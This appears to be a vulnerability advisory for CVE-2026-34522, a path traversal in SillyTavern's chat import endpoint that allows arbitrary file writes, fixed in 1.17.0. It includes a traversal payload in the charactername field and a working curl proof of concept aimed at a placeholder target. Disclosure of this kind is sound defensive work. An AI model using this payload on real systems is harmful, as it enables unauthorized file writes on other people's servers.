CVE-2026-34522: SillyTavern: Path traversal in `/api/chats/import` allows arbitrary file write outside intended chat directory
Summary A path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into charactername.
Details charactername is used unsafely as part of the destination filename and then passed into path.join(...) without sanitization.
Evidence: - Import handler entrypoint: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L680-L686> - Unsanitized charactername used in output filename: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L719-L723> - Same write pattern in JSONL import branch: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L759-L766> - Endpoint auth context (authenticated user access): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239>
Example payload: - charactername=../../../../tmp/stpoc
This causes the final destination path to escape from <user>/chats/<avatar>/... and write to an attacker-controlled location such as /tmp/... (or any writable path for the service account).
PoC Prerequisites: - Valid authenticated session cookie (cookie.txt) - Valid CSRF token ($TOKEN)
Prepare payload:
bash printf '{"username":"u","chatmetadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonl
Trigger arbitrary write:
bash curl -b cookie.txt -H "x-csrf-token: $TOKEN" \ -F "avatar=@/tmp/poc.jsonl" \ -F "filetype=jsonl" \ -F "avatarurl=a.png" \ -F "charactername=../../../../tmp/stpoc" \ -F "username=u" \ http://TARGET:8000/api/chats/import
Observed result: - A file is created outside chats directory, for example: /tmp/stpoc - <timestamp> imported.jsonl
Impact - Integrity: attacker can create files in unintended filesystem locations. - Availability: can be used for disk abuse and disruptive file placement. - Can become more severe when chained with other local processing behaviors.
Resolution
The issue was addressed in version 1.17.0
Other sources
SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to version 1.17.0, a path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into charactername. This issue has been patched in version 1.17.0.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/sillytavernto a version that resolves this vulnerability.Fixed in 1.17.0 - Upgrade
Upgrade
SillyTavernto a version that resolves this vulnerability.Fixed in 1.17.0